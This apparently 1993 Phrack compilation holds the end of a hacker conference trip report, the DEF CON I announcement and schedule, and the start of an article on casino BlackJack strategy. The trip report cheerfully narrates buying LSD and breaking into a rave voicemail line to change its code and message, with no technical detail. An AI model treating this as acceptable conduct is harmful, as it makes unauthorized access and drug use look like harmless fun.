were gone.  We wandered up and down the street for about 30 minutes looking
for our prey.  Finally we saw them.  They saw us.  One ran like a marathon
sprinter.  The other stayed, but was soon flanked by a gang of eight
other transients.  X-con walked right up and said "You fucking ripped us
off!"

As we tried to get either our money back or working drugs, more and more
transients gathered.  It was time to write it off as a loss.  We cursed
and backed away from the crowd.

Our group had congregated at a grocery store at the end of the street.
Mr. Blast was speed dialing the raveline in a desperate attempt to
find a venue to spin wildly in and blow his day-glo rave whistle.

Across the street, a homeless black man screamed painfully at each and
every passing car, "HELP!  You gotta take me and my girlfriend to
the hospital now!  She's gonna DIE!"  He staggered over to us
and begged for a ride, we respectfully declined.

As this was going on, the grocery store erupted with violence as
a drunken frat type was ejected forcibly.  He started swinging
wildly at the rent-a-cop, and was greeted with the business end
of a police baton.

The Pilot decided this was a good time to make his exit.  He waved
goodbye and was gone.

RBOC, Voxman and a nameless waif arrived in the parking lot.  We
told them the status of the rave and they decided to wait to see if
there may be any type of decadence forthcoming.  About that time
Mr. Blast came screaming across the lot with the directions.

We no longer had room for everyone, so Voxman & the nameless waif were
offered a ride from a flaming pedophile who overheard their plight.
The took him up on his offer before we could stop them.  We said a quick
prayer for them and piled into the car.

16. Stark Raving Mad Late Into The Night

The new location was out at a marina in Berkeley on the beach.  It took damn
near an enternity to get there and when we arrived it was raining.
X-con and I made it our mission to find acid at this location.  The music
could be heard for several hundred yards from the street, so we took off
in a sprint towards the source.

There were roughly 40 or so people.  Thirty-nine guys, one ugly girl.

X-con immediately disappeared in the crowd looking for someone with
a beeper...anyone.  Fender disappeared.  Fitz disappeared.  RBOC and I
sat and made rude comments.  X-con arrived back with a big smile.

Our saviour was in the form of a teenage Hispanic dude.  He had red blotter
with elephant, and yellow blotter with some other kind of design.  The
yellow was "three-way."  We bought several of each, and there was much
rejoicing.  X-con had already eaten one three-way and one regular, before
I could split one in half for RBOC.  The taste was overwhelming.
Freshly squeezed.

The three of us perched up on a hill staring out over the undulating mass
waiting for the effect.  It came quickly.

As it hit, Fitz wandered up and said, "Let's hack the raveline!"
This idea went over VERY WELL, so we all set out towards the car, leaving
little sparky streamers behind us as we moved.

From a nearby hotel lobby, Fitz and X-con busily hacked at the VMB
while RBOC and I sat in the car totally wigging.  About 30 minutes
later they ran out screaming.  It had been done and the code was
now 902100.

We drove back to the rave and noticed the red and blues flashing and the
ravers bailing en masse.  We picked up Mr. Blast and Fender and took off
back to our hotel.  Fender had done a bit of networking at the rave and
exchanged a few business cards.  We were totally appalled.

Once back at the hotel X-con took even more.  He said he wanted to see
static.  Within an hour he achieved his goal.  He spent a large portion of
the night walking in and out of the room muttering, "Man...you guys are
totally fucking with me."

We then decided to spice up the raveline.  RBOC changed the outgoing
message a few times and then finally decided on, "HAR HAR HAR, Y'all been
boarded by the pirate!  No more techno!  No more homosexuals
grinding away at 120 beats per minute!  No more Rave!  HAR HAR HAR!"
We laughed like schoolgirls.

Everyone passed out.  Everyone but us tripsters of course.  We stayed up
the majority of the night telling really odd pharmaceutical war stories.

At about 6 am RBOC decided that he was hungry and called for room service.
He ordered linguini.  The room service clerk told him that the kitchen
was not ready for dinner, and would only be serving breakfast.  RBOC
replied, "Look, do you have noodles?  Yes?  Do you have water?  Well,
what's the fucking problem.  What exactly do you need to boil water?
Turn on the stove, and I'll be down in a few minutes to make it myself."
With this logic, the room service clerk replied his linguini would
be up in about half an hour.

We then decided to get escorts, or at least order up a few, and listen
to them on their cell phones calling their pimps.  (Fender had listened
to about five different such conversations a few nights prior.)
RBOC ordered up a couple of buxom blondes to go and we waited for their
return phone call to barter on the price.

The call never came in.  The hotel had turned off our phone for incoming
calls.  This sparked even more fun, as RBOC called up the front desk
to complain, "Look ma'am, my hookers can't fucking call into my room!
Turn my phone back on NOW!  I've had a rough night up for 24 hours on
drugs, and I need a woman."  The operator was not amused.

The sun rose.  We all remarked about the typical morning after layer of
filth that seems to congeal after a good fry.  The static was no longer
visible to X-con and he became almost lucid again, interjecting bits
of wisdom like "Uh" and "Yeah" into the conversation.  His flight was in
two hours.

The linguini arrived and everyone had a small taste as the smell of
the white sauce permeated the room.  As we smacked away, the inexperienced
of the crowd arose to greet a new morning.  RBOC suddenly realized that
NYC was probably snowed under, so he took off to find a phone to check
on the status of his flight home.

X-con gathered his bags and mumbled "Later," and disappeared.  I fell on the
bed and disappeared into darkness.

17. Laterz

The alarm clock blared out a sickening beep, to which it was rewarded with
a small flight across the hotel room.  I gathered up my gear and made a
beeline towards the elevator.

Still confused, I wandered down to the lobby where I was greeted by
Fitzgerald and Fender.  I bid them both a fond farewell and boarded
the airport shuttle.  This was one hell of a good time.  I wonder if
CFP4 in Chicago will be as good?  One can only hope.  See you there.


***************************************************************************

                  D E F  C O N  I   C O N V E N T I O N
                  D E F  C O N  I   C O N V E N T I O N
                          DEF CON I CONVENTION
                  D E F  C O N  I   C O N V E N T I O N

>> READ AND DISTRIBUTE AND READ AND DISTRIBUTE AND READ AND DISTRIBUTE <<


                    Finalized Announcement: 5/08/1993

              We are proud to announce the 1st annual Def Con.

    If you are at all familiar with any of the previous Con's, then you
will have a good idea of what DEF CON I will be like. If you don't have any
experience with Con's, they are an event on the order of a pilgrimage to
Mecca for the underground. They are a mind-blowing orgy of information
exchange, viewpoints, speeches, education, enlightenment... And most of all
sheer, unchecked PARTYING. It is an event that you must experience at least
once in your lifetime.

    The partying aside, it is a wonderful opportunity to met some of the
celebrities of the underground computer scene. And those that shape its
destiny - the lawyers, libertarians, and most of all the other There will
be plenty of open-ended discussion on security, telephones and other
topics. As well as what TIME magazine calls the "Cyberpunk Movement".

    Las Vegas, is as you might have guessed a great choice for the Con.
Gambling, loads of hotels and facilities, cheap air fare and room rates.
It's also in the West Coast making it more available to a different crowd
than the former Cons have been.

Your foray into the scene and your life will be forever incomplete
if by some chance you miss out on DEF CON I. Plan to be there!


WHO:   You know who you are.
WHAT:  Super Blowout Party Fest, with Speakers and Activities.
WHERE: Las Vegas, Nevada
WHEN:  July 9th, 10th and 11th (Fri, Sat, Sun) 1993
WHY:   To meet all the other people out there you've been talking to for
       months and months, and get some solid information instead of rumors.


DESCRIPTION:

     So your bored, and have never gone to a convention?  You want to meet
all the other members of the so called 'computer underground'?  You've been
calling BBS systems for a long time now, and you definitely have been
interacting on the national networks.  You've bullshitted with the best,
and now it's time to meet them in Vegas!  For me I've been networking for
years, and now I'll get a chance to meet everyone in the flesh.  Get
together with a group of your friends and make the journey.

     We cordially invite all hackers/phreaks, techno-rats, programmers,
writers, activists, lawyers, philosophers, politicians, security officials,
cyberpunks and all network sysops and users to attend.

     DEF CON I will be over the weekend in the middle of down town Las
Vegas at the Sands Hotel.  Why Las Vegas?  Well the West Coast hasn't had
a  good Convention that I can remember, and Las Vegas is the place to do it.
Cheap food, alcohol, lots of entertainment and, like us, it never sleeps.
We will have a convention room open 24 hours so everyone can meet and plan
and scheme till they pass out.  Events and speakers will be there to provide
distraction and some actual information and experiences from this loosely
knit community.

        This is an initial announcement.  It is meant only to alert you to
the time, dates and location of the convention.  Future announcements will
inform you about specific speakers and events.

        An information pack is FTPable off of the internet at nwnexus.wa.com,
in the cd/pub/dtangent directory. The IP# is 192.135.191.1  Information
updates will be posted there in the future as well as scanned map images and
updated speaker lists.

FINAL NOTES:

        COST:  How you get there is up to you, but United Airlines will be
the official carrier (meaning if you fly you get a 5% to 10% price reduction
off the cheapest available fare at the time of ticket purchase)  When buying
airline tickets, call 1-800-521-4041 and reference meeting ID# 540ii.  Hotel
Rooms will cost $62 per night for a double occupancy room.  Get your friends
together and split the cost to $31.  Food is inexpensive.  The entertainment
is free inside the hotel.  Reference the DEF CON I convention when
registering, as we have a block of rooms locked out, but once they go it will
be first come, fist serve.  Call 1-800-634-6901 for the reservations desk.

        The convention itself will cost $30 at the door, or $15 in advance.
It pays to register in advance! Also it helps us plan and cover expenses!
Mail checks/money orders/cashiers checks to: DEF CON I, 2709 East Madison
Street, #102, Seattle, WA, 98112.  Make them payable to: "DEF CON" we're not
trying to make money, we will be trying to cover costs of the conference room
and hotel plus air fair for the speakers who require it.  Don't bother mailing
it a week in advance, that just won't happen.  Advanced registration gets you
a groovy 24 bit color pre-generated name tag.  Include with your payment the
name you want listed, your association/group affiliation/bbs/whatever, email
address, and/or bbs number for syops.  Last day for the registrations to reach
me will be July 1st.

        SPEAKERS:  We have solicited speakers from all aspects of the
computer underground and associated culture (Law, Media, Software Companies,
Cracking Groups, Hacking Groups, Magazine Editors, Etc.)  If you know of
someone interested in speaking on a self selected topic, please contact The
Dark Tangent to discuss it.

FOR MORE INFORMATION:

        For initial comments, requests for more information, information
about speaking at the event, or maps to the section where prostitution is
legal outside Las Vegas (Just Kidding) Contact The Dark Tangent by leaving
me mail at: dtangent@dtangent.wa.com on the InterNet.

Or call: 0-700-TANGENT for conference information/updates and to leave
         questions or comments.
Or Snail Mail (U.S. Postal Service) it to DEF CON, 2709 East Madison Street,
#102, Seattle, WA, 98112.

Future information updates will pertain to the speaking agenda.

------------------------------------------------------------------------------
Updates since the last announcement:

>> The Secret Service is too busy to attend.
>> New Media Magazine, Unix World and Robert X. Cringly have stated they will
   attend.
>> We got a voice mail system working (I think) for comments and questions.
>> We don't have enough $$$ to fly out the EFF or Phillip Zimmerman (Author
   of PGP) or Loyd Blankenship.
>> Judy Clark will be representing the CPSR and a few other organizations

Don't forget to bring a poster / banner representing any of the groups you
belong to.  I want to cover the conference room walls with a display of all
the various groups / people attending.  (Break out the crayons and markers)

------------------------------------------------------------------------------



     DEF CON I CONVENTION  [PROPOSED SPEAKING SCHEDULE UPDATED 5.31.1993]

             Saturday the 10th of July 10am, Sands Hotel, Las Vegas



         INTRODUCTION       Welcome to the convention
                            *The Dark Tangent (CON Organizer)

      Keynote speaker       Cyberspace, Society, crime and the future.

                            To hack or not to hack, that is not the question
                            *Ray Kaplan

   Civil Libertarians
                -CPSR       Computer Privacy/1st Amendment/Encryption
                            Gender Rolls and Discrimination
                            *Judi Clark

       -USC Comp. Law       Legalities of BBS Operation, message content
                            laws and network concerns.
                            *Allen Grogan, Editor of Computer Lawyer

     'The Underworld'
          -Networking       Concerns of National Networking
                            of CCi (Cyber Crime International) Network.
                            *Midnight Sorrow.

         Corporations
    -Packet Switching
               SPRINT       Concerns/security and the future
                  MCI       of packet switching.
                            (*Jim Black, MCI Systems Integrity)


                 Misc       Common misbeliefs and rumors of the underground
                            *Scott Simpson

     -Virtual Reality       The law, and it's intersection with VR
                            *Karnow

       -Unix Security      Future developments in unix security software,
                           General Q&A on unix security
                           *Dan Farmer

-System Administrator       Security Concerns of an Administrator
                            *Terminus

     The 'Underworld'
            -Internet       The security problems with Internet/Networks
                            Overview of hacking
                            *Dark Druid

      -Getting Busted       The process of getting "busted"
                            *Count Zero

  -How to be a nobody       Hiding your identity in the high-tech future, or
                            The payphone is your friend.
                            *TBA-nonymous

     -The Prosecutors       Their concerns/problems and
       Hacker Hunters       suggestions for the 'underworld'/Q&A

           CONCLUSION       General Q&A


This itinerary is proposed, and topics and speakers will be marked as
permanent once a confirmation is received.  This is by no means the exact
format of DEF CON I.  Any Questions / Comments Contact:

dtangent@dtangent.wa.com
Voice Mail 0-700-TANGENT
------------------------------------------------------------------------------
[>             DEF CON I and United Airlines Travel Arrangements             <]


        United Airlines has been chosen as the official carrier for DEF CON I
and is pleased to offer a 10% discount off the unrestricted BUA coach fare or
a 5% discount off the lowest applicable fares, including first class.  This
special offer is available only to attendees of this meeting, and applies to
travel on domestic segments of all United Airlines and United Express flights.
A 5% discount off any fare is also available for attendees traveling to or from
Canada in conjunction with your meeting.  These fares are available through
United's Meeting Desk with all fare rules and restrictions applying.

        Help support the DEF CON I Conference by securing your reservations
with United Airlines.  To obtain the best fares or schedule information,
please call United's Specialized Meeting Reservations Center at 1-800-521-4041.
Dedicated reservationists are on duty 7 days a week from 7:00 a.m. to 1:00 a.m.
ET.  Please be sure to reference ID number 540II.  You or your travel agent
should call today as seats may be limited.

        As a United Meeting attendee you qualify for special discount rates
on Hertz rental cars.  Mileage Plus members receive full credit for all miles
flown to this meeting.

        Tickets will be mailed by United or you can pick them up at your
local travel agency or United Airlines ticket office.



Generic update #1---

My system exploded, so it's been hard to keep in touch with everyone,
but my mail response should be better now.  Yep the conference is
still on.  A blown hard drive won't kill me.  You can reach me for
information or questions at 0-700-TANGENT (the DEF CON I hot line)

-----


--
Sorry for the huge signature, but I like privacy on sensitive matters.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.2

mQCNAiviMB8AAAEEANO4XmnggG8h8XWtfxShMvRUarlpj2OBSPMrzUNRAKEjupUj
f/FfszMk0G60GSiCfiosw/m2JcKPQ6OZgQCxfElFUcYkKx/rYjgU3viEmNasjAwN
jR/9l0WSXlv4CjCUtH/t4rm1C1bs8i6iznmu/dCeuUEZQoRm0Lrdt/10TGt3AAUT
tCtUaGUgRGFyayBUYW5nZW50IDxkdGFuZ2VudEBkdGFuZ2VudC53YS5jb20+
=DxKN
-----END PGP PUBLIC KEY BLOCK-----

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 9 of 27

                            How to "Hack" BlackJack
                                      By
                                  Lex Luthor
                                     and
                         The Legion of Gamblerz!! (LOG)
                 lex@mindvox.phantom.com (or) lex@stormking.com

                               Part 1 of 2 (50K)


BLURB:
"I learned a lot of things I didn't know from Lex's File" ---Bruce Sterling


Introduction:
-------------

   With the DEF CON 1 hacker/cyberpunk/law enforcement/security/etc convention
coming up in Las Vegas, Nevada on July 9-12 1993, I felt that now would be a
good time to write a "phile" on something the attendants could put to use to
help legally defray the costs of going. The thought of a bunch of ex-hackers
running around Las Vegas without shirts (having 'lost' them in the various
Casinos) frightened me into immediate action. Besides, I don't write articles
on 'Underground' topics anymore and since I have done a lot of research and
playing of Casino BlackJack, the CON in Vegas provided me the perfect excuse
to finally write an article for PHRACK (not withstanding the pro-phile in
Issue 40 which doesn't really count).

   Regardless of whether you go to this DEF CON 1 thing, if you ever plan to
hit a casino with the purpose of MAKING MONEY, then you really should
concentrate on ONE game of chance: BlackJack. Why? Because BlackJack is the
*ONLY* casino game that affords the educated and skilled player a long-term
mathematical advantage over the house. All the other casino games: Craps,
Roulette, Slots, etc. have the long-term mathematical advantage over the
player (see table below). BlackJack is also the only casino game for which the
odds are always changing. Don't be fooled by all the glitter, a casino is a
business and must make a profit to survive. The profit is ensured by using a
set of rules which provides them with an edge. Now you say: wait a sec, how do
they make money if BlackJack can be beaten? There are a couple of reasons. One
reason is that there are very few good players who make it their profession to
beat casinos at BlackJack day in and day out. There are many more who THINK
they are good, THINK they know how to play the game, and lose more money than
the really good players win. Notwithstanding the throngs of vacationers who
admit to not being well versed in the game and consequently are doomed to
lose...plenty. Another reason is that if a casino thinks you are a "counter"
(a term just as nasty as "phreaker" to the phone company) there is a good
chance that they will ask you to leave. See the section on Social Engineering
the Casino to avoid being spotted as a counter. Also, the house secures its
advantage in BlackJack from the fact that the player has to act first. If you
bust, the dealer wins your bet regardless of whether the dealer busts later.

   The following table illustrates my point regarding house advantages for the
various casino games and BlackJack strategies. The data is available in most
books on casino gambling. Note that negative percentages denote player
disadvantages and are therefore house advantages.

   --------------------------------------------------------------------------
   GAME                             Your Advantage (over the long run)
   --------------------------------------------------------------------------
   Craps                            -1.4 % overall average
   Baccarat                         -1.1 % to -5.0 %
   Roulette                         -2.7 % to -5.26 %
   Slots                            -2.5 to -25 % depending on machine setting
   Keno                             -25 % more or less

   BlackJack (WAG Player)           -2 % to -15 %
   BlackJack (Mirror Dealer)        -5.7 %
   BlackJack (Basic Strategy)       -0.2 % to +0.3 %
   BlackJack (Basic Strategy &      Up to +3.1 % depending on card counting
              Card Counting)        system and betting range.

   A -2 % player advantage (2 percent disadvantage) means that if you play a
hundred hands at a dollar each, then ON AVERAGE, you will lose two dollars.
Note that the typical "pick three" State Lottery game is a disaster as your
advantage is -50 %. If you make 1000 $1 bets, you will lose $500 on average.
Some people say that state lotteries are taxation on the stupid...

   This article contains thirteen sections. It was written in a fairly modular
fashion so if there are sections which do not interest you, you may omit them
without much loss in continuity however, all the sections are networked to
some degree. For the sake of completeness, a fairly comprehensive list of
topics has been presented. Due to email file size restrictions, I had to
divide this article into two parts. Note that I am NOT a Professional
BlackJack player, the definition being someone whose livelihood is derived
solely from his/her winnings. I did however, dedicate a summer to gambling 5
evenings a week or so, keeping meticulous records of wins, losses and expenses
incurred. I averaged 1-2 nights a week playing BlackJack with the other nights
divided among 3 different forms of Pari-Mutual gambling. At the end of the
summer I tallied the wins/losses/expenses and am proud to say the result was a
positive net earnings. Unfortunately it was instantly apparent that the net
money when divided up by the number of weeks gambling was not enough to
warrant me to quit school and become a professional gambler. Besides that
one summer, I have played BlackJack off and on for 7 years or so. In case you
were wondering, no, I have never been a member of GA [Gamblers Anonymous]
contrary to what one of those Bell Security "Hit-Lists" circulated many years
ago would have you believe. The topics contained herein are:

     o    Historical Background of the BlackJack Card Game
     o    Useful Gambling, Casino, and BlackJack Definitions
     o    Review of BlackJack Rules of Play
     o    Betting, Money Management, and the Psychology of Gambling
     o    Basic Strategy (End of Part 1)
     o    Card Counting (Beginning of Part 2)
     o    Shuffle Tracking
     o    Casino Security and Surveillance
     o    "Social Engineering" the Casino
     o    Casino Cheating and Player Cheating
     o    Some Comments Regarding Computer BlackJack Games for PC's
     o    A VERY Brief Description of Other Casino Games
     o    Selected Bibliography and Reference List

Notes:

     a) I made extensive use of my many books, articles, and magazines on
gambling and BlackJack along with actual playing experience. References are
denoted by square brackets [REF#] and are listed in the Selected Bibliography
and Reference List section.

     b) It's hard to win at something you don't understand. If you want to win
consistently at anything, learn every thing you can about it. BlackJack is no
exception.


History of BlackJack:
---------------------

   I provide this historical background information because I find it rather
fascinating and it also provides some insight into contemporary rules and
play. I think it is worth reading for the sole reason that you might some day
use one of the historical tid-bits to answer a question on Jeopardy!#@%!
Seriously, the first couple of paragraphs may read a bit like a book report,
but bear with it if you can as I did all of the following research
specifically for this file.

   First, a brief history of cards: Playing cards are believed to have been
invented in China and/or India sometime around 900 A.D. The Chinese are
thought to have originated card games when they began shuffling paper money
(another Chinese invention) into various combinations. In China today, the
general term for playing cards means "paper tickets". The contemporary 52 card
deck used in the U.S. was originally referred to as the "French Pack" (circa
1600's) which was later adopted by the English and subsequently the Americans.

   The first accounts of gambling were in 2300 B.C. or so, and yes, the
Chinese again get the credit. Gambling was very popular in Ancient Greece even
though it was illegal and has been a part of the human experience ever since.
Today, with the all too common manipulation of language to suit one's own
purposes, gambling is no longer a term used by casinos....they prefer to use
the word GAMING instead. Just as Post Traumatic Stress Disorder has replaced
the term Shell Shock in military jargon. Since this manipulation of language
is all the rage these days, why don't we water down the name Computer Hacker
and replace it with Misguided Information Junky or someone who is afflicted
with a Compulsive Curiosity Disorder?

   The history of the BlackJack card game itself is still disputed but was
probably spawned from other French games such as "chemin de fer and French
Ferme", both of which I am completely unfamiliar with. BlackJack originated in
French Casino's around 1700 where it was called "vingt-et-un" ("twenty-and-
one" in French) and has been played in the U.S. since the 1800's. BlackJack is
called Black-Jack because if a player got a Jack of Spades and an Ace of
Spades as the first two cards (Spade being the color black of course), the
player was additionally remunerated.

   Gambling was legal out West from the 1850's to 1910 at which time Nevada
made it a felony to operate a gambling game. In 1931, Nevada re-legalized
casino gambling where BlackJack became one of the primary games of chance
offered to gamblers. As some of you may recall, 1978 was the year casino
gambling was legalized in Atlantic City, New Jersey. As of 1989, only two
states had legalized casino gambling. Since then, about 20 states have a
number of small time casinos (compared to Vegas) which have sprouted up in
places such as Black Hawk and Cripple Creek Colorado and in river boats on the
Mississippi. Also as of this writing, roughly 70 Native American Indian
reservations operate or are building casinos, some of which are in New York
and Connecticut. In addition to the U.S., some of the countries (there are
many) operating casinos are: France, England, Monaco (Monte Carlo of course)
and quite a few in the Caribbean islands (Puerto Rico, Bahamas, Aruba, etc.).

   Now: The first recognized effort to apply mathematics to BlackJack began in
1953 and culminated in 1956 with a published paper [6]. Roger Baldwin et al
(see Bibliography) wrote a paper in the Journal of the American Statistical
Association titled "The Optimum Strategy in BlackJack". These pioneers used
calculators, and probability and statistics theory to substantially reduce the
house advantage. Although the title of their paper was 'optimum strategy', it
wasn't really the best strategy because they really needed a computer to
refine their system. I dug up a copy of their paper from the library, it is
ten pages long and fairly mathematical. To give you an idea of its importance,
the Baldwin article did for BlackJack playing what the November 1960 issue of
The Bell System Technical Journal entitled, "Signalling Systems for Control of
Telephone Switching", did for Blue Boxing.

   To continue with the analogy, one can consider Professor Edward O. Thorp to
be the Captain Crunch of BlackJack. Dr. Thorp, then a mathematics teacher,
picked up where Baldwin and company left off. In 1962, Thorp refined their
basic strategy and developed the first card counting techniques. He published
his results in "Beat the Dealer" [3], a book that became so popular that for a
week in 1963 it was on the New York Time's best seller list. The book also
scared the hell out of the Casino's. Thorp wrote "Beat the Market" in 1967, in
which he used mathematics and computer algorithms to find pricing
inefficiencies between stocks and related securities. Currently he is using an
arbitrage formula to exploit undervalued warrants in the Japanese stock
market.

   The Casinos were so scared after Beat the Dealer, that they even changed
the rules of the game to make if more difficult for the players to win. This
didn't last long as people protested by not playing the new pseudo-BlackJack.
The unfavorable rules resulted in a loss of income for the casinos. Not making
money is a sin for a casino, so they quickly reverted back to the original
rules. Because Thorp's "Ten-Count" method wasn't easy to master and many
people didn't really understand it anyway, the casinos made a bundle from the
game's newly gained popularity thanks to Thorp's book and all the media
attention it generated.

   Beat the Dealer is rather difficult to find these days, I picked up a copy
at the library recently and checked the card in the back to see how popular
it is today. I was surprised as hell to find that it was checked out over 20
times in the past year and a half or so! How many books from 1962 can claim
that? I do not recommend reading the book for anything other than posterity
purposes though, the reason being that newer books contain better, and easier
to learn strategies.

   Another major contributor in the history of winning BlackJack play is
Julian Braun who worked at IBM. His thousands of lines of computer code and
hours of BlackJack simulation on IBM mainframes resulted in THE Basic
Strategy, and a number of card counting techniques. His conclusions were used
in a 2nd edition of Beat the Dealer, and later in Lawrence Revere's 1977 book
"Playing BlackJack as a Business".

   Lastly, let me mention Ken Uston, who used five computers that were built
into the shoes of members of his playing team in 1977. They won over a hundred
thousand dollars in a very short time but one of the computers was
confiscated and sent to the FBI. The fedz decided that the computer used
public information on BlackJack playing and was not a cheating device. You may
have seen this story in a movie made about his BlackJack exploits detailed in
his book "The Big Player". Ken was also featured on a 1981 Sixty Minutes show
and helped lead a successful legal challenge to prevent Atlantic City casinos
from barring card counters.


Useful Definitions:
-------------------

   Just as in Social Engineering the Phone Company, an essential element for
success is knowing the right buzzwords and acronyms. Therefore, I list some
relevant definitions now, even though the reader will probably skip over them
to get to the good stuff. The definitions merely serve as a reference for
those who are uninitiated with the terminology of gambling, casinos, and
BlackJack. If you encounter a term you don't understand in the article, look
back here. The definitions are not in alphabetical order on purpose. I grouped
them in what I feel is a logical and easy to remember fashion.

Action: This is a general gambling term which refers to the total amount of
        money bet in a specific period of time. Ten bets of ten dollars each
        is $100 of action.

Burn Card: A single card taken from the top of the deck or the first card in
           a shoe which the dealer slides across the table from his/her left
           to the right, and is placed into the discard tray. The card may or
           may not be shown face up (which can affect the count if you are
           counting cards). A card is burned after each shuffle. I have
           not been able to find out how this started nor the purpose for
           burning a card. If you know, drop me some email.

Cut Card: A solid colored card typically a piece of plastic which is given to
          a player by the dealer for the purpose of cutting the deck(s) after
          a shuffle. Cutting the cards in the 'right' location is part of
          the 'shuffle tracking' strategy mentioned later in Part 2.

Hole Card: Any face down card. The definition most often refers to the
           dealer's single face down card however.

Shoe: A device that can hold up to eight decks of cards which allows the
      dealer to slide out the cards one at a time.

Hard Hand: A hand in which any Ace is counted as a 1 and not as an 11.

Soft Hand: A hand in which any Ace is counted as an 11 and not as a 1.

Pat Hand: A hand with a total of 17 to 21.

Stand: To decline another card.

Hit: To request another card.

Bust: When a hand's value exceeds 21....a losing hand.

Push: A player-dealer tie.

Pair: When a player's first two cards are numerically identical (ie, 7,7).

Point Count: The net value of the card count at the end of a hand.

Running Count: The count from the beginning of the deck or shoe. The running
               count is updated by the value of the point count after each
               hand.

True Count: The running count adjusted to account for the number of cards left
            in the deck or shoe to be played.

Bankroll: The stake (available money) a player plans to bet with.

Flat Bet: A bet which you do not vary ie, if you are flat betting ten dollars,
          you are betting $10 each and every hand without changing the betting
          amount from one hand to the next.

Black Chip: A $100. chip.

Green Chip: A $25.00 chip.

Red Chip: A $5.00 chip.

Foreign Chip: A chip that is issued by one casino and is honored by another
              as cash. A casino is not necessarily obligated to accept them.

Settlement: The resolving of the bet. Either the dealer takes your chips,
            pays you, or in the case of a push, no exchange of chips occurs.

Toke: Its not what some of you may think...to "toke" the dealer is just
      another word for tipping the dealer.

Marker: An IOU. A line of credit provided by the casino to a player.

Junket: An organized group of gamblers that travel to a casino together.
        Junkets are usually subsidized by a casino to attract players.

Comp: Short for complimentary. If you wave lots of money around, the casino
      (hotel) may give you things like a free room or free f00d hoping you'll
      keep losing money at the tables in their casino.

Heat: The pressure a casino puts on a winning player, typically someone who
      is suspected of being a card counter.

Shuffle Up: Prematurely shuffling the cards to harass a player who is usually
            suspected of being a counter.

Nut: The overhead costs of running the casino.

Pit: The area inside a group of gaming tables. The tables are arranged in
     an elliptical manner, the space inside the perimeter is the pit.

House: The Casino of course.

Cage: Short for cashier's cage. This is where chips are redeemed for cash,
      checks cashed, credit arranged, etc.

House Percentage: The casino's advantage in a particular game of chance.

Drop Percentage: That portion of the player's money that the casino will win
                 because of the house percentage. It is a measure of the
                 amount of a player's initial stake that he or she will
                 eventually lose. On average this number is around 20 percent.
                 That is, on average, Joe Gambler will lose $20 of every $100
                 he begins with.

Head-On: To play alone at a BlackJack table with the dealer.

WAG Player: Wild Assed Guessing player.

SWAG Player: Scientific Wild Assed Guessing player.

Tough Player: What the casino labels an '3L33T' player who can hurt the casino
              monetarily with his or her intelligent play.

Counter: Someone who counts cards.

High Roller: A big bettor.

Mechanic: Someone who is elite in regards to manipulating cards, typically for
          illicit purposes.

Shill: A house employee who bets money and pretends to be a player to attract
       customers. Shills typically follow the same rules as the dealer which
       makes them somewhat easy to spot (ie, they don't Double Down or Split).

Pit Boss: An employee of the casino whose job is to supervise BlackJack
          players, dealers, and other floor personnel.


Review of BlackJack Rules of Play:
----------------------------------

   The rules of BlackJack differ slightly from area to area and/or from casino
to casino. For example, a casino in downtown Vegas may have different rules
than one of the Vegas Strip casinos which may have different rules from a
casino up in Reno or Tahoe (Nevada). The rules in a casino in Freeport Bahamas
may differ from those in Atlantic City, etc. Therefore, it is important to
research, a priori, what the rules are for the area/casino(s) you plan on
playing in. For Nevada casinos you can order a copy of [1] which contains
rules info on all the licensed casinos in the state. Later in this article,
you will see that each set of rule variations has a corresponding Basic
Strategy chart that must be memorized. Memorizing all the charts can be too
confusing and is not recommended.

   The BlackJack table seats a dealer and one to seven players. The first seat
on the dealer's left is referred to as First Base, the first seat on the
dealer's right is referred to as Third Base. A betting square is printed on
the felt table in front of each player seat. Immediately in front of the
dealer is the chip tray. On the dealer's left is the deck or shoe and beside
that should be the minimum bet sign--something that you ought to read before
sitting down to play. On the dealer's immediate right is the money drop slot
where all currency and tips (chips) are deposited. Next to the drop slot is
the discard tray. Play begins after the following ritual is completed: the
dealer shuffles the cards, the deck(s) is "cut" by a player using the marker
card, and the dealer "burns" a card.

   Before any cards are dealt, the players may make a wager by placing the
desired chips (value and number) into the betting box. I used the word "may"
because you are not forced to bet every hand. Occasionally a player may sit
out a hand or two for various reasons. I have sat out a couple of hands at
times when the dealer was getting extremely lucky and everyone was losing. If
you attempt to sit out too many hands especially if there are people waiting
to play at your table, you may be asked to leave the table until you are ready
to play. If you don't have any chips, put some cash on the table and the
dealer will exchange them for chips.

   Once all the bets are down, two cards (one at a time) are dealt from left
to right. In many Vegas casinos, players get both cards face down. In Atlantic
City and most every where else the player's cards are dealt face up. Should
the cards be dealt face up, don't make the faux pas of touching them! They are
dealt face up for a reason, primarily to prevent a few types of player
cheating (see section on cheating in Part 2) and the dealer will sternly but
nicely tell you not to touch the cards. As most of you know the dealer receives
one card down and one card up. The numerical values of the cards are:
(10, J, Q, K) = 10 ; (Ace) = 1 or 11 ; (other cards) = face value (3 = 3).

   Since a casino can be as noisy as an old Step-by-Step Switch with all those
slot machines going, marbles jumping around on roulette wheels, demoniacal
shrieks of "YO-LEVEN" at the craps table, people screaming that they hit the
big one and so on, hand signals are usually the preferred method of signalling
hit, stand, etc.

   If the cards were dealt face down and you want a hit, lightly flick the
cards across the felt two times. If the cards were dealt face up, point at the
cards with a quick stabbing motion. You may also want to nod your head yes
while saying "hit".  The best way to indicate to the dealer that you want to
stand regardless of how the cards were dealt is to move your hand from left
to right in a level attitude with your palm down. Your hand should be a few
inches or so above the table. Nodding your head no at the same time helps,
while saying "stay" or "stand".

   Permit me to interject a comment on the number of decks used in a game.
Single deck games are pretty much restricted to Nevada casinos. In the casinos
that have one-deck games, the tables are usually full. Multiple deck games
typically consist of an even number of decks (2, 4, 6, 8) although a few
casinos use 5 or 7 decks. The two main reasons many casinos use multiple decks
are:
      1) They allow the dealer to deal more hands per hour thereby increasing
         the casino take.

      2) They reduce but in no way eliminate the player advantage gained
         from card counting.

   Dealer Rules - The rules the dealer must play by are very simple. If the
dealer's hand is 16 or less, he/she must take a card. If the dealer's hand is
17 or more, he/she must stand. Note that some casinos allow the dealer to hit
on soft 17 which gives the house a very small additional advantage. The
dealer's strategy is fixed and what you and the other players have is
immaterial to him/her as far as hitting and standing is concerned.

   Player rules - The player can do whatever he/she wants as far as hitting and
standing goes with the exception of the following special circumstances. See
the section on Basic Strategy for the appropriate times to hit, stand, split,
and double down. The aim is to have a hand which is higher than the dealers'.
